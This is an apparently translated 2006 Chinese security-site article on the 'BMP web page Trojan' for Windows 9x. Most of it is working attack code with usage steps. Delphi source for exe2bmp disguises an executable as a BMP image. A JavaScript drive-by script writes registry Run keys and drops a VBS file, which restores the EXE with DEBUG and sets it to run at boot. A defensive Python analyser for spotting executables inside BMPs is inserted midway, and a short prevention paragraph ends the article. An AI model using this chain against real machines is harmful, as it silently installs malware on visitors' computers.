Using pictures to carry Trojans, fully analysed - vulnerability warning - Black Bar Safety Net

ID MYHACK58:62200612864
Type myhack58
Reporter 佚名 (anonymous)
Modified 2006-11-14T00:00:00


What is a BMP web page Trojan? It differs from the MIME-header-vulnerability Trojans that have been notorious for so long. A MIME Trojan MIME-encodes an EXE file into an EML (Outlook Express mail) file, places it on a web page, and exploits the IE and OE encoding vulnerability to download and execute it automatically.

A BMP Trojan works differently: it disguises an EXE file as a BMP picture so that IE downloads it automatically, then uses JavaScript on the web page to locate the client's Temporary Internet Files folder, find the downloaded BMP, and copy it to the TEMP directory. A further script restores the BMP into an EXE with DEBUG and adds it to the registry startup items so that it runs at the next boot. This technique only works on Windows 9x; against 2000 and XP it is powerless.

This looks complicated, so let us go through it step by step. 1) Converting an EXE into a BMP. Looking at the BMP file format, we see that the BMP header is 54 bytes; put simply, it holds the image's width and height, the bit depth, the file size and the length of the pixel data. If we prepend the corresponding BMP header to the EXE file (with the header fields made consistent with the EXE's size), IE can be tricked into downloading it as a BMP. We first tried this with a JPG file and found that IE does not download the file when the header is wrong. The conversion code is as follows:

program exe2bmp;

uses Windows, SysUtils;

var
  len, row, col, fs: DWORD;
  buffer: array[0..255] of char;
  fd: WIN32_FIND_DATA;
  h, hw: THandle;

begin
  if (ParamStr(1) <> '') and (ParamStr(2) <> '') then  // exit unless two parameters were given
  begin
    if FileExists(ParamStr(1)) then
    begin
      FindFirstFile(PChar(ParamStr(1)), fd);
      fs := fd.nFileSizeLow;
      col := 4;
      // round the length up to a multiple of 12 and pick a width/height that cover it
      while true do
      begin
        if (fs mod 12) = 0 then
          len := fs
        else
          len := fs + 12 - (fs mod 12);
        row := len div col div 3;
        if row > col then
          col := col + 4
        else
          Break;
      end;
      FillChar(buffer, 256, 0);
      {Fill in the BMP file header}
      buffer[0] := 'B'; buffer[1] := 'M';
      PDWORD(@buffer[18])^ := col;       // biWidth
      PDWORD(@buffer[22])^ := row;       // biHeight
      PDWORD(@buffer[34])^ := len;       // biSizeImage
      PDWORD(@buffer[2])^ := len + 54;   // bfSize
      PDWORD(@buffer[10])^ := 54;        // bfOffBits
      PDWORD(@buffer[14])^ := 40;        // biSize
      PWORD(@buffer[26])^ := 1;          // biPlanes
      PWORD(@buffer[28])^ := 24;         // biBitCount
      {Write to file}
      hw := CreateFile(PChar(ParamStr(2)), GENERIC_WRITE, FILE_SHARE_READ or FILE_SHARE_WRITE, nil, CREATE_ALWAYS, 0, 0);
      h := CreateFile(PChar(ParamStr(1)), GENERIC_READ, FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_EXISTING, 0, 0);
      WriteFile(hw, buffer, 54, col, nil);   // col is reused as the bytes-written variable from here on
      repeat
        ReadFile(h, buffer, 256, col, nil);
        WriteFile(hw, buffer, col, col, nil);
      until col <> 256;
      WriteFile(hw, buffer, len - fs, col, nil);  // pad up to the rounded length
      CloseHandle(h);
      CloseHandle(hw);
    end;
  end;
end.

The code above compiles under Delphi 4, 5 or 6 and yields exe2bmp.exe. Open an MS-DOS window and run exe2bmp myexe.exe mybmp.bmp; this converts the EXE named by the first parameter into a BMP written to the second. Next, place the BMP picture on a web page. If you open this picture you will only see noise-like, monotone colours, so the best way to put it on the page is in this form: <IMG width=0 height="0" src="mybmp.bmp">
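As an added example for this page (not code from the original article), the following Python inspects a file that claims to be a BMP the way a defender or analyst would: it parses the 54-byte header described above, checks that the geometry fields are consistent, and tests whether the "pixel data" at bfOffBits is really an MZ/PE executable; it also carves that region, which is the same span the article's later DEBUG script writes out. The two sample inputs are constructed inline (the MZ stub is a fake header, not a real executable).

```python
import struct

HEADER_FMT = "<2sIHHIIiiHHIIiiII"  # 14-byte BITMAPFILEHEADER + 40-byte BITMAPINFOHEADER = 54 bytes

def parse_bmp_header(data: bytes) -> dict:
    """Unpack the fields exe2bmp fills; raise if the file is not BMP-shaped."""
    if len(data) < struct.calcsize(HEADER_FMT) or data[:2] != b"BM":
        raise ValueError("not a BMP file")
    f = struct.unpack_from(HEADER_FMT, data)
    return {"bf_size": f[1], "bf_offbits": f[4], "width": f[6], "height": f[7],
            "bpp": f[9], "compression": f[10], "size_image": f[11]}

def find_embedded_pe(data: bytes, start: int):
    """Return MZ/PE evidence if the 'pixel data' beginning at `start` is an executable."""
    if data[start:start + 2] != b"MZ" or start + 0x40 > len(data):
        return None
    e_lfanew = struct.unpack_from("<I", data, start + 0x3C)[0]  # offset of the PE header
    pe = start + e_lfanew
    return {"mz_offset": start, "pe_signature": data[pe:pe + 4] == b"PE\0\0"}

def analyze(data: bytes) -> dict:
    """Header sanity checks plus the decisive test: what sits at bfOffBits."""
    hdr, findings = parse_bmp_header(data), []
    # exe2bmp output is geometrically self-consistent (width a multiple of 4, 24 bpp,
    # biSizeImage == width*3*height), so these two checks only catch sloppier polyglots.
    pitch = ((hdr["width"] * hdr["bpp"] + 31) // 32) * 4  # row stride, 4-byte aligned
    if hdr["size_image"] and hdr["size_image"] != pitch * abs(hdr["height"]):
        findings.append("biSizeImage inconsistent with width/height/bpp")
    if hdr["bf_size"] != len(data):
        findings.append("bfSize %d != actual size %d" % (hdr["bf_size"], len(data)))
    pe = find_embedded_pe(data, hdr["bf_offbits"])
    if pe:
        findings.append("MZ header at bfOffBits %d (PE signature: %s)" % (pe["mz_offset"], pe["pe_signature"]))
    return {"header": hdr, "embedded_pe": pe, "findings": findings}

def carve_payload(data: bytes) -> bytes:
    """biSizeImage bytes from bfOffBits, the region DEBUG writes out; exe2bmp pads to a multiple of 12."""
    hdr = parse_bmp_header(data)
    return data[hdr["bf_offbits"]:hdr["bf_offbits"] + hdr["size_image"]]

def build_sample() -> bytes:
    """Constructed fixture: exe2bmp-style header for a 72-byte 'EXE' (8x3 px, 24 bpp) + fake MZ stub."""
    stub = b"MZ" + bytes(58) + struct.pack("<I", 64) + b"PE\0\0" + bytes(4)  # e_lfanew -> PE\0\0
    hdr = struct.pack(HEADER_FMT, b"BM", 54 + len(stub), 0, 0, 54, 40, 8, 3, 1, 24, 0, len(stub), 0, 0, 0, 0)
    return hdr + stub

def build_benign() -> bytes:
    """Constructed fixture: a genuine 1x1 white 24-bpp BMP (one 4-byte padded row)."""
    return struct.pack(HEADER_FMT, b"BM", 58, 0, 0, 54, 40, 1, 1, 1, 24, 0, 4, 0, 0, 0, 0) + b"\xff\xff\xff\x00"
```

Run analyze() over the files in a browser cache directory and treat any non-empty findings list, above all an MZ header at bfOffBits, as grounds to quarantine the file.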

The following script is placed on the page:

document.write(' ');
function docsave()
{
  a=document.applets[0];
  a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}');
  a.createInstance();
  wsh=a.GetObject();
  a.setCLSID('{0D43FE01-F093-11CF-8940-00A0C9054228}');
  a.createInstance();
  fso=a.GetObject();
  var winsys=fso.GetSpecialFolder(1);
  var vbs=winsys+'\\s.vbs';
  wsh.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs','wscript '+'"'+vbs+'" ');
  var st=fso.CreateTextFile(vbs,true);
  st.WriteLine('Option Explicit');
  st.WriteLine('Dim FSO,WSH,CACHE,str');
  st.WriteLine('Set FSO = CreateObject("Scripting.FileSystemObject")');
  st.WriteLine('Set WSH = CreateObject("WScript.Shell")');
  st.WriteLine('CACHE=wsh.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellFolders\\Cache")');
  st.WriteLine('wsh.RegDelete("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs")');
  st.WriteLine('wsh.RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\tmp","tmp.exe"');
  st.WriteLine('SearchBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp"');
  st.WriteLine('WScript.Quit()');
  st.WriteLine('Function SearchBMPFile(Folder,fname)');
  st.WriteLine(' Dim SubFolder,File,Lt,tmp,winsys');
  st.WriteLine(' str=FSO.GetParentFolderName(folder) & "\\" & folder.name & "\\" & fname');
  st.WriteLine(' if FSO.FileExists(str) then');
  st.WriteLine(' tmp=fso.GetSpecialFolder(2) & "\\"');
  st.WriteLine(' winsys=fso.GetSpecialFolder(1) & "\\"');
  st.WriteLine(' set File=FSO.GetFile(str)');
  st.WriteLine(' File.Copy(tmp &"tmp.dat")');
  st.WriteLine(' File.Delete');
  st.WriteLine(' set Lt=FSO.CreateTextFile(tmp &"tmp.in")');
  st.WriteLine(' Lt.WriteLine("rbx")');
  st.WriteLine(' Lt.WriteLine("0")');
  st.WriteLine(' Lt.WriteLine("rcx")');
  st.WriteLine(' Lt.WriteLine("1000")');
  st.WriteLine(' Lt.WriteLine("w136")');
  st.WriteLine(' Lt.WriteLine("q")');
  st.WriteLine(' Lt.Close');
  st.WriteLine(' WSH.Run "command /c debug" & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out",false,6');
  st.WriteLine(' On Error Resume Next ');
  st.WriteLine(' FSO.GetFile(tmp &"tmp.dat").Copy(winsys & "tmp.exe")');
  st.WriteLine(' FSO.GetFile(tmp &"tmp.dat").Delete');
  st.WriteLine(' FSO.GetFile(tmp &"tmp.in").Delete');
  st.WriteLine(' FSO.GetFile(tmp &"tmp.out").Delete');
  st.WriteLine(' end if');
  st.WriteLine(' If Folder.SubFolders.Count <> 0 Then');
  st.WriteLine(' For Each SubFolder In Folder.SubFolders');
  st.WriteLine(' SearchBMPFile SubFolder,fname');
  st.WriteLine(' Next');
  st.WriteLine(' End If');
  st.WriteLine('End Function');
  st.Close();
}
setTimeout('docsave()',1000);

The script is saved as "js.js" and inserted into a web page:

The script's main job is to generate an "S.VBS" file in the local machine's SYSTEM directory; that script file runs automatically at the next boot. Its purpose is to find the mybmp[1].bmp file in the temporary Internet folder. The main contents of "S.VBS" are as follows:

Option Explicit
Dim FSO,WSH,CACHE,str
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSH = CreateObject("WScript.Shell")
CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders\Cache")
wsh.RegDelete("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\vbs")
wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\tmp","tmp.exe"
SearchBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp"
WScript.Quit()

Function SearchBMPFile(Folder,fname)
  Dim SubFolder,File,Lt,tmp,winsys
  ' Look for the target BMP picture in the temporary folder
  str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname
  if FSO.FileExists(str) then
    tmp=fso.GetSpecialFolder(2) & "\"
    winsys=fso.GetSpecialFolder(1) & "\"
    set File=FSO.GetFile(str)
    File.Copy(tmp &"tmp.dat")
    File.Delete
    ' Generate a DEBUG script
    set Lt=FSO.CreateTextFile(tmp &"tmp.in")
    Lt.WriteLine("rbx")
    Lt.WriteLine("0")
    Lt.WriteLine("rcx")
    ' The 1000 on the next line is hexadecimal; in decimal it is 4096 (this number is the size of your EXE file)
    Lt.WriteLine("1000")
    Lt.WriteLine("w136")
    Lt.WriteLine("q")
    Lt.Close
    WSH.Run "command /c debug" & tmp & "tmp.dat <" & tmp &"tmp.in>" & tmp & "tmp.out",false,6
    On Error Resume Next
    FSO.GetFile(tmp &"tmp.dat").Copy(winsys & "tmp.exe")
    FSO.GetFile(tmp &"tmp.dat").Delete
    FSO.GetFile(tmp &"tmp.in").Delete
    FSO.GetFile(tmp &"tmp.out").Delete
  end if
  If Folder.SubFolders.Count <> 0 Then
    For Each SubFolder In Folder.SubFolders
      SearchBMPFile SubFolder,fname
    Next
  End If
End Function

This script looks for the BMP file in the temporary Internet folder, generates a DEBUG script and runs it automatically; DEBUG writes out the amount of data you specified, starting 54 bytes into the BMP file (offset 136h, since DEBUG loads the file at 100h), and saves it to tmp.dat. The script then copies that file into the SYSTEM directory, so the restored EXE runs the next time the machine starts. That is the basic implementation of the BMP Trojan. For the detailed script code, see http://hotsky.363.net

Prevention: the simplest measure is to delete or rename wscript.exe and the DEBUG program. Install effective anti-virus software, since most antivirus products can detect these scripts. Where conditions allow, install Windows 2000 SP3, and avoid visiting obscure websites of unknown origin.